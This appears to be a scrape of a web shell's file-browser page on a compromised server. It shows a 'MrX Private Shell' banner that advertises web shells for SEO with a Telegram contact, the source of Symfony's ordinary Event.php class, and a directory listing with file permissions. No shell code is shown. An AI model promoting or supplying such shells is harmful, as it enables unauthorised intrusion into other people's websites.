__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php /* * This file is part of the Symfony package. * * (c) Fabien Potencier <[email protected]> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Symfony\Component\EventDispatcher; /** * Event is the base class for classes containing event data. * * This class contains no event data. It is used by events that do not pass * state information to an event handler when an event is raised. * * You can call the method stopPropagation() to abort the execution of * further listeners in your event listener. * * @author Guilherme Blanco <[email protected]> * @author Jonathan Wage <[email protected]> * @author Roman Borschel <[email protected]> * @author Bernhard Schussek <[email protected]> */ class Event { /** * @var bool Whether no further event listeners should be triggered */ private $propagationStopped = false; /** * Returns whether further event listeners should be triggered. * * @see Event::stopPropagation() * * @return bool Whether propagation was already stopped for this event */ public function isPropagationStopped() { return $this->propagationStopped; } /** * Stops the propagation of the event to further event listeners. * * If multiple event listeners are connected to the same event, no * further event listener will be triggered once any trigger calls * stopPropagation(). */ public function stopPropagation() { $this->propagationStopped = true; } }
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| Debug | Folder | 0775 |
|
|
| DependencyInjection | Folder | 0775 |
|
|
| ContainerAwareEventDispatcher.php | File | 7.03 KB | 0664 |
|
| Event.php | File | 1.59 KB | 0664 |
|
| EventDispatcher.php | File | 7.02 KB | 0664 |
|
| EventDispatcherInterface.php | File | 3.09 KB | 0664 |
|
| EventSubscriberInterface.php | File | 1.68 KB | 0664 |
|
| GenericEvent.php | File | 3.61 KB | 0664 |
|
| ImmutableEventDispatcher.php | File | 2.12 KB | 0664 |
|
| composer.json | File | 1.14 KB | 0664 |
|